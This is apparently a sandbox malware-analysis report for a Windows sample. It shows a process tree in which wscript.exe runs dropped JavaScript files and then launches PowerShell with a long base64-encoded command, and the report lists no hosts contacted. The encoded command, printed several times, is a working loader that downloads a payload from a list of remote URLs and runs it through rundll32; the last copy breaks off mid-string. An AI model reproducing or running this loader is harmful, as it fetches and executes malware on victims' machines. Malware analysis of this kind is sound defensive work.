Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | May 25, 2023, 10:45 a.m. | May 25, 2023, 10:47 a.m. |
-
wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\exosporeEloper.js
2584-
wscript.exe "C:\Windows\System32\wscript.exe" "C:\ProgramData\overrimBowsie.js" TherapeutismUnadopt dutchess crystallising
2860-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABBAG4AbwBtAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE4AUQBBAHgAQQBDADQAQQBNAFEAQQAwAEEARABVAEEATABnAEEAeQBBAEQAQQBBAE4AZwBBAHUAQQBEAEUAQQBPAFEAQQB4AEEAQQA9AD0AIgA7ACQAcABoAGEAcgBtAGEAYwBvAHAAZQBkAGkAYQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE8AQQBBAHUAQQBEAEkAQQBNAFEAQQB3AEEAQwA0AEEATwBBAEEAMQBBAEMANABBAE0AUQBBADAAQQBEAFUAQQBMAHcAQQA1AEEARQA0AEEAYQBRAEEAMABBAEMAOABBAE8AUQBBAD0AYgBMAEcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABRAEEATQBBAEEAdQBBAEQARQBBAE4AUQBBAHcAQQBDADQAQQBNAFEAQQA1AEEARABJAEEATABnAEEAeABBAEQAWQBBAE0AQQBBAHYAQQBHAG8AQQBNAEEAQgBKAEEARwBnAEEAWQB3AEEAdgBBAEYAQQBBAE4AZwBBAHcAQQBHAGMAQQBiAHcAQQA9AGIATABHAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE4AdwBBAHUAQQBEAEUAQQBNAHcAQQAyAEEAQwA0AEEATQBnAEEAMABBAEQAawBBAEwAZwBBAHgAQQBEAEEAQQBPAFEAQQB2AEEARgBRAEEATQBBAEEAdgBBAEgAawBBAGEAdwBCAEwAQQBFAFEAQQBiAEwARwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADEAQQBEAFUAQQBMAGcAQQA0AEEARABjAEEATABnAEEANQBBAEQAYwBBAEwAZwBBAHgAQQBEAFUAQQBNAEEAQQB2AEEARABJAEEATAB3AEEAMQBBAEEAPQA9AGIATABHAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE0AUQBBAHcAQQBEAFEAQQBMAHcAQgBVAEEARQB3AEEAUgB3AEIAbwBBAEUANABBAFoAQQBBAHYAQQBGAEUAQQBWAHcAQgBrAEEARABVAEEAUwBRAEIAVwBBAEYAZwBBAFUAdwBCAG8AQQBHAFUAQQBiAEwARwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFEAQQBPAFEAQQB1AEEARABFAEEATgBRAEEAMABBAEMANABBAE0AUQBBADEAQQBEAGsAQQBMAGcAQQA1AEEARABnAEEATAB3AEIAUQBBAEgAQQBBAFYAUQBCAFoAQQBGAGcAQQBMAHcAQgB3AEEARQA0AEEAWgBBAEIASgBBAEgAawBBAFYAdwBBAHgAQQBBAD0APQBiAEwARwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AZwBBAHoAQQBDADQAQQBOAGcAQQB4AEEAQwA4AEEATwBRAEIAaABBAEQAWQBBAE4AdwBCAHcAQQBHAFUAQQBjAHcAQQB2AEEARABBAEEAZABnAEEAMABBAEcAbwBBAE0AQQBCAHgAQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABGAGwAYQBwAHAAZQByAE8AbABhAG0AaQBjACAAaQBuACAAJABwAGgAYQByAG0AYQBjAG8AcABlAGQAaQBhACAALQBzAHAAbABpAHQAIAAiAGIATABHACIAKQAgAHsAdAByAHkAIAB7ACQARQB4AGMAaABhAG4AZwBlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBIAEUAQQBkAFEAQgBsAEEASABJAEEAYwB3AEIAdwBBAEgASQBBAGQAUQBCAHUAQQBHAGMAQQBRAGcAQgBsAEEARwB3AEEAYgBBAEIAMwBBAEcAOABBAGMAZwBCADAAQQBIAE0AQQBMAGcAQgBuAEEARwBFAEEAYwBnAEIAawBBAEcAVQBBAGIAZwBBAD0AdQBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIATwBBAEcAOABBAGIAZwBCAHcAQQBHADgAQQBaAFEAQgAwAEEARwBrAEEAWQB3AEEAdQBBAEgATQBBAGQAUQBCAHkAQQBHAGMAQQBaAFEAQgB5AEEASABrAEEAdQBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUATQBBAGEAQQBCAHAAQQBHAE0AQQBhAHcAQgAzAEEARwBVAEEAWgBRAEIAawBBAEMANABBAGMAdwBCADAAQQBIAFUAQQBaAEEAQgBwAEEARwA4AEEAdQBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE4AdwBBADUAQQBDADQAQQBNAFEAQQB4AEEARABrAEEATABnAEEAeABBAEQAYwBBAE4AUQBBAHUAQQBEAGsAQQBOAGcAQQA9ACIAOwAkAEYAbABpAGMAawBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBRAEEAYwBnAEIAcABBAEcANABBAGIAdwBCAGsAQQBHAFUAQQBVAEEAQgB5AEEARwA4AEEAZABnAEIAcABBAEcANABBAFoAdwBCAHMAQQBIAGsAQQBMAGcAQgBoAEEARwBVAEEAIgA7ACQATABlAHQAdAByAHUAcgBlAE8AdgBlAHIAYQBiAHUAcwBpAHYAZQBuAGUAcwBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEYAbABhAHAAcABlAHIATwBsAGEAbQBpAGMAKQApADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAJABMAGUAdAB0AHIAdQByAGUATwB2AGUAcgBhAGIAdQBzAGkAdgBlAG4AZQBzAHMAIAAtAE8AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAYwBsAGEAbQBvAHUAcgBpAHMAdAAuAHoAbwBvAGIAbABhAHMAdAA7ACQAQQBzAHMAaQBkAHUAbwB1AHMAbgBlAHMAcwBEAGUAbgBhAHQAdQByAGEAdABpAG8AbgBhAGwAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBIAE0AQQBkAEEAQgBwAEEARwA0AEEAZABBAEIAcABBAEcANABBAFoAdwBCAHMAQQBIAGsAQQBUAFEAQgBwAEEARwA0AEEAWgBRAEIAeQBBAEcARQBBAGEAUQBCAHYAQQBHAGMAQQBhAFEAQgBqAEEAQwA0AEEAWQB3AEIAdgBBAEcAMABBAEoAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQB3AEEAMwBBAEMANABBAE0AUQBBADMAQQBEAGMAQQBMAGcAQQB4AEEARABRAEEATwBRAEEAdQBBAEQAYwBBAE4AdwBBAD0ASgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADEAQQBEAGMAQQBMAGcAQQA0AEEARABBAEEATABnAEEAeQBBAEQAVQBBAE0AZwBBAHUAQQBEAEkAQQBNAEEAQQB4AEEAQQA9AD0ASgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEUAQQBHAFUAQQBiAFEAQgAxAEEARwB3AEEAWQB3AEIAbABBAEcANABBAGQAQQBCAHoAQQBDADQAQQBaAGcAQgB5AEEAQQA9AD0AIgA7ACQAcwBwAHIAaQB0AGUAaABvAG8AZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMQBBAEQAVQBBAEwAZwBBAHkAQQBEAEEAQQBNAFEAQQB1AEEARABFAEEATgBnAEEAMABBAEMANABBAE0AUQBBAHcAQQBEAGcAQQAiADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABjAGwAYQBtAG8AdQByAGkAcwB0AC4AegBvAG8AYgBsAGEAcwB0ACkALgBMAGUAbgBnAHQAaAAgAC0AZwBlACAAMgA0ADgAOQAwADcAKQB7AHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAbgBjAG8AZABlAGQAYwBvAG0AbQBhAG4AZAAgACIAYwB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDAEEAQQBjAGcAQgAxAEEARwA0AEEAWgBBAEIAcwBBAEcAdwBBAE0AdwBBAHkAQQBDAEEAQQBKAEEAQgBsAEEARwA0AEEAZABnAEEANgBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEAUgBBAEIAaABBAEgAUQBBAFkAUQBCAGMAQQBHAE0AQQBiAEEAQgBoAEEARwAwAEEAYgB3AEIAMQBBAEgASQBBAGEAUQBCAHoAQQBIAFEAQQBMAGcAQgA2AEEARwA4AEEAYgB3AEIAaQBBAEcAdwBBAFkAUQBCAHoAQQBIAFEAQQBMAEEAQgBpAEEARwBrAEEAYgBnAEIAawBBAEQAcwBBACIAOwAkAEQAZQBjAHUAcgByAGUAbgBjAGUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQASQBBAE0AQQBBAHUAQQBEAEkAQQBNAGcAQQB3AEEAQwA0AEEATQBRAEEAdwBBAEQAZwBBAEwAZwBBADQAQQBEAEUAQQB6AFYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABVAEEAYgBnAEIAbABBAEcAMABBAGMAQQBCAHMAQQBHADgAQQBlAFEAQgBsAEEARwBRAEEATABnAEIAdwBBAEcAZwBBAGIAdwBCADAAQQBHADgAQQBjAHcAQQA9ACIAOwAkAFMAdABlAGcAYQBuAG8AcABvAGQAbwB1AHMAUgBpAGMAaABlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAE0AQQBOAGcAQQB1AEEARABFAEEATgBBAEEAeQBBAEMANABBAE0AUQBBAHkAQQBEAFkAQQBMAGcAQQB5AEEARABJAEEATQBnAEEAPQBPAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE4AZwBBAHUAQQBEAEUAQQBPAFEAQQAzAEEAQwA0AEEATgBnAEEANQBBAEMANABBAE4AdwBBAHgAQQBBAD0APQBPAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQASQBBAE0AUQBBAHUAQQBEAEkAQQBNAGcAQQAyAEEAQwA0AEEATQBnAEEAeABBAEQAawBBAEwAZwBBADEAQQBEAE0AQQBPAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAUQBBAE8AQQBBAHUAQQBEAEUAQQBPAEEAQQB4AEEAQwA0AEEATQBRAEEAMgBBAEQAYwBBAEwAZwBBAHgAQQBEAFkAQQBPAEEAQQA9ACIAOwAkAFQAZQBuAGEAaQBsAHMASgB1AG0AcABvAGYAZgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE4AUQBBAHoAQQBDADQAQQBNAGcAQQB5AEEARABjAEEATABnAEEAMABBAEQAZwBBAEwAZwBBAHgAQQBEAGMAQQBPAEEAQQA9ACIAOwBiAHIAZQBhAGsAOwB9AH0AIABjAGEAdABjAGgAIAB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMAOwB9AH0A"
2972
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
IP Address | Status | Action |
---|---|---|
No hosts contacted. |
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABBAG4AbwBtAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE4AUQBBAHgAQQBDADQAQQBNAFEAQQAwAEEARABVAEEATABnAEEAeQBBAEQAQQBBAE4AZwBBAHUAQQBEAEUAQQBPAFEAQQB4AEEAQQA9AD0AIgA7ACQAcABoAGEAcgBtAGEAYwBvAHAAZQBkAGkAYQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE8AQQBBAHUAQQBEAEkAQQBNAFEAQQB3AEEAQwA0AEEATwBBAEEAMQBBAEMANABBAE0AUQBBADAAQQBEAFUAQQBMAHcAQQA1AEEARQA0AEEAYQBRAEEAMABBAEMAOABBAE8AUQBBAD0AYgBMAEcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABRAEEATQBBAEEAdQBBAEQARQBBAE4AUQBBAHcAQQBDADQAQQBNAFEAQQA1AEEARABJAEEATABnAEEAeABBAEQAWQBBAE0AQQBBAHYAQQBHAG8AQQBNAEEAQgBKAEEARwBnAEEAWQB3AEEAdgBBAEYAQQBBAE4AZwBBAHcAQQBHAGMAQQBiAHcAQQA9AGIATABHAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE4AdwBBAHUAQQBEAEUAQQBNAHcAQQAyAEEAQwA0AEEATQBnAEEAMABBAEQAawBBAEwAZwBBAHgAQQBEAEEAQQBPAFEAQQB2AEEARgBRAEEATQBBAEEAdgBBAEgAawBBAGEAdwBCAEwAQQBFAFEAQQBiAEwARwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADEAQQBEAFUAQQBMAGcAQQA0AEEARABjAEEATABnAEEANQBBAEQAYwBBAEwAZwBBAHgAQQBEAFUAQQBNAEEAQQB2AEEARABJAEEATAB3AEEAMQBBAEEAPQA9AGIATABHAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE0AUQBBAHcAQQBEAFEAQQBMAHcAQgBVAEEARQB3AEEAUgB3AEIAbwBBAEUANABBAFoAQQBBAHYAQQBGAEUAQQBWAHcAQgBrAEEARABVAEEAUwBRAEIAVwBBAEYAZwBBAFUAdwBCAG8AQQBHAFUAQQBiAEwARwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFEAQQBPAFEAQQB1AEEARABFAEEATgBRAEEAMABBAEMANABBAE0AUQBBADEAQQBEAGsAQQBMAGcAQQA1AEEARABnAEEATAB3AEIAUQBBAEgAQQBBAFYAUQBCAFoAQQBGAGcAQQBMAHcAQgB3AEEARQA0AEEAWgBBAEIASgBBAEgAawBBAFYAdwBBAHgAQQBBAD0APQBiAEwARwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AZwBBAHoAQQBDADQAQQBOAGcAQQB4AEEAQwA4AEEATwBRAEIAaABBAEQAWQBBAE4AdwBCAHcAQQBHAFUAQQBjAHcAQQB2AEEARABBAEEAZABnAEEAMABBAEcAbwBBAE0AQQBCAHgAQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABGAGwAYQBwAHAAZQByAE8AbABhAG0AaQBjACAAaQBuACAAJABwAGgAYQByAG0AYQBjAG8AcABlAGQAaQBhACAALQBzAHAAbABpAHQAIAAiAGIATABHACIAKQAgAHsAdAByAHkAIAB7ACQARQB4AGMAaABhAG4AZwBlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBIAEUAQQBkAFEAQgBsAEEASABJAEEAYwB3AEIAdwBBAEgASQBBAGQAUQBCAHUAQQBHAGMAQQBRAGcAQgBsAEEARwB3AEEAYgBBAEIAMwBBAEcAOABBAGMAZwBCADAAQQBIAE0AQQBMAGcAQgBuAEEARwBFAEEAYwBnAEIAawBBAEcAVQBBAGIAZwBBAD0AdQBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIATwBBAEcAOABBAGIAZwBCAHcAQQBHADgAQQBaAFEAQgAwAEEARwBrAEEAWQB3AEEAdQBBAEgATQBBAGQAUQBCAHkAQQBHAGMAQQBaAFEAQgB5AEEASABrAEEAdQBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUATQBBAGEAQQBCAHAAQQBHAE0AQQBhAHcAQgAzAEEARwBVAEEAWgBRAEIAawBBAEMANABBAGMAdwBCADAAQQBIAFUAQQBaAEEAQgBwAEEARwA4AEEAdQBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE4AdwBBADUAQQBDADQAQQBNAFEAQQB4AEEARABrAEEATABnAEEAeABBAEQAYwBBAE4AUQBBAHUAQQBEAGsAQQBOAGcAQQA9ACIAOwAkAEYAbABpAGMAawBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBRAEEAYwBnAEIAcABBAEcANABBAGIAdwBCAGsAQQBHAFUAQQBVAEEAQgB5AEEARwA4AEEAZABnAEIAcABBAEcANABBAFoAdwBCAHMAQQBIAGsAQQBMAGcAQgBoAEEARwBVAEEAIgA7ACQATABlAHQAdAByAHUAcgBlAE8AdgBlAHIAYQBiAHUAcwBpAHYAZQBuAGUAcwBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEYAbABhAHAAcABlAHIATwBsAGEAbQBpAGMAKQApADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAJABMAGUAdAB0AHIAdQByAGUATwB2AGUAcgBhAGIAdQBzAGkAdgBlAG4AZQBzAHMAIAAtAE8AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAYwBsAGEAbQBvAHUAcgBpAHMAdAAuAHoAbwBvAGIAbABhAHMAdAA7ACQAQQBzAHMAaQBkAHUAbwB1AHMAbgBlAHMAcwBEAGUAbgBhAHQAdQByAGEAdABpAG8AbgBhAGwAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBIAE0AQQBkAEEAQgBwAEEARwA0AEEAZABBAEIAcABBAEcANABBAFoAdwBCAHMAQQBIAGsAQQBUAFEAQgBwAEEARwA0AEEAWgBRAEIAeQBBAEcARQBBAGEAUQBCAHYAQQBHAGMAQQBhAFEAQgBqAEEAQwA0AEEAWQB3AEIAdgBBAEcAMABBAEoAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQB3AEEAMwBBAEMANABBAE0AUQBBADMAQQBEAGMAQQBMAGcAQQB4AEEARABRAEEATwBRAEEAdQBBAEQAYwBBAE4AdwBBAD0ASgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADEAQQBEAGMAQQBMAGcAQQA0AEEARABBAEEATABnAEEAeQBBAEQAVQBBAE0AZwBBAHUAQQBEAEkAQQBNAEEAQQB4AEEAQQA9AD0ASgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEUAQQBHAFUAQQBiAFEAQgAxAEEARwB3AEEAWQB3AEIAbABBAEcANABBAGQAQQBCAHoAQQBDADQAQQBaAGcAQgB5AEEAQQA9AD0AIgA7ACQAcwBwAHIAaQB0AGUAaABvAG8AZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMQBBAEQAVQBBAEwAZwBBAHkAQQBEAEEAQQBNAFEAQQB1AEEARABFAEEATgBnAEEAMABBAEMANABBAE0AUQBBAHcAQQBEAGcAQQAiADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABjAGwAYQBtAG8AdQByAGkAcwB0AC4AegBvAG8AYgBsAGEAcwB0ACkALgBMAGUAbgBnAHQAaAAgAC0AZwBlACAAMgA0ADgAOQAwADcAKQB7AHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAbgBjAG8AZABlAGQAYwBvAG0AbQBhAG4AZAAgACIAYwB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDAEEAQQBjAGcAQgAxAEEARwA0AEEAWgBBAEIAcwBBAEcAdwBBAE0AdwBBAHkAQQBDAEEAQQBKAEEAQgBsAEEARwA0AEEAZABnAEEANgBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEAUgBBAEIAaABBAEgAUQBBAFkAUQBCAGMAQQBHAE0AQQBiAEEAQgBoAEEARwAwAEEAYgB3AEIAMQBBAEgASQBBAGEAUQBCAHoAQQBIAFEAQQBMAGcAQgA2AEEARwA4AEEAYgB3AEIAaQBBAEcAdwBBAFkAUQBCAHoAQQBIAFEAQQBMAEEAQgBpAEEARwBrAEEAYgBnAEIAawBBAEQAcwBBACIAOwAkAEQAZQBjAHUAcgByAGUAbgBjAGUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQASQBBAE0AQQBBAHUAQQBEAEkAQQBNAGcAQQB3AEEAQwA0AEEATQBRAEEAdwBBAEQAZwBBAEwAZwBBADQAQQBEAEUAQQB6AFYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABVAEEAYgBnAEIAbABBAEcAMABBAGMAQQBCAHMAQQBHADgAQQBlAFEAQgBsAEEARwBRAEEATABnAEIAdwBBAEcAZwBBAGIAdwBCADAAQQBHADgAQQBjAHcAQQA9ACIAOwAkAFMAdABlAGcAYQBuAG8AcABvAGQAbwB1AHMAUgBpAGMAaABlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAE0AQQBOAGcAQQB1AEEARABFAEEATgBBAEEAeQBBAEMANABBAE0AUQBBAHkAQQBEAFkAQQBMAGcAQQB5AEEARABJAEEATQBnAEEAPQBPAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE4AZwBBAHUAQQBEAEUAQQBPAFEAQQAzAEEAQwA0AEEATgBnAEEANQBBAEMANABBAE4AdwBBAHgAQQBBAD0APQBPAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQASQBBAE0AUQBBAHUAQQBEAEkAQQBNAGcAQQAyAEEAQwA0AEEATQBnAEEAeABBAEQAawBBAEwAZwBBADEAQQBEAE0AQQBPAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAUQBBAE8AQQBBAHUAQQBEAEUAQQBPAEEAQQB4AEEAQwA0AEEATQBRAEEAMgBBAEQAYwBBAEwAZwBBAHgAQQBEAFkAQQBPAEEAQQA9ACIAOwAkAFQAZQBuAGEAaQBsAHMASgB1AG0AcABvAGYAZgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE4AUQBBAHoAQQBDADQAQQBNAGcAQQB5AEEARABjAEEATABnAEEAMABBAEQAZwBBAEwAZwBBAHgAQQBEAGMAQQBPAEEAQQA9ACIAOwBiAHIAZQBhAGsAOwB9AH0AIABjAGEAdABjAGgAIAB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMAOwB9AH0A" |
cmdline | powershell -encodedcommand "JABBAG4AbwBtAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE4AUQBBAHgAQQBDADQAQQBNAFEAQQAwAEEARABVAEEATABnAEEAeQBBAEQAQQBBAE4AZwBBAHUAQQBEAEUAQQBPAFEAQQB4AEEAQQA9AD0AIgA7ACQAcABoAGEAcgBtAGEAYwBvAHAAZQBkAGkAYQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE8AQQBBAHUAQQBEAEkAQQBNAFEAQQB3AEEAQwA0AEEATwBBAEEAMQBBAEMANABBAE0AUQBBADAAQQBEAFUAQQBMAHcAQQA1AEEARQA0AEEAYQBRAEEAMABBAEMAOABBAE8AUQBBAD0AYgBMAEcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABRAEEATQBBAEEAdQBBAEQARQBBAE4AUQBBAHcAQQBDADQAQQBNAFEAQQA1AEEARABJAEEATABnAEEAeABBAEQAWQBBAE0AQQBBAHYAQQBHAG8AQQBNAEEAQgBKAEEARwBnAEEAWQB3AEEAdgBBAEYAQQBBAE4AZwBBAHcAQQBHAGMAQQBiAHcAQQA9AGIATABHAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE4AdwBBAHUAQQBEAEUAQQBNAHcAQQAyAEEAQwA0AEEATQBnAEEAMABBAEQAawBBAEwAZwBBAHgAQQBEAEEAQQBPAFEAQQB2AEEARgBRAEEATQBBAEEAdgBBAEgAawBBAGEAdwBCAEwAQQBFAFEAQQBiAEwARwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADEAQQBEAFUAQQBMAGcAQQA0AEEARABjAEEATABnAEEANQBBAEQAYwBBAEwAZwBBAHgAQQBEAFUAQQBNAEEAQQB2AEEARABJAEEATAB3AEEAMQBBAEEAPQA9AGIATABHAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE0AUQBBAHcAQQBEAFEAQQBMAHcAQgBVAEEARQB3AEEAUgB3AEIAbwBBAEUANABBAFoAQQBBAHYAQQBGAEUAQQBWAHcAQgBrAEEARABVAEEAUwBRAEIAVwBBAEYAZwBBAFUAdwBCAG8AQQBHAFUAQQBiAEwARwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFEAQQBPAFEAQQB1AEEARABFAEEATgBRAEEAMABBAEMANABBAE0AUQBBADEAQQBEAGsAQQBMAGcAQQA1AEEARABnAEEATAB3AEIAUQBBAEgAQQBBAFYAUQBCAFoAQQBGAGcAQQBMAHcAQgB3AEEARQA0AEEAWgBBAEIASgBBAEgAawBBAFYAdwBBAHgAQQBBAD0APQBiAEwARwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AZwBBAHoAQQBDADQAQQBOAGcAQQB4AEEAQwA4AEEATwBRAE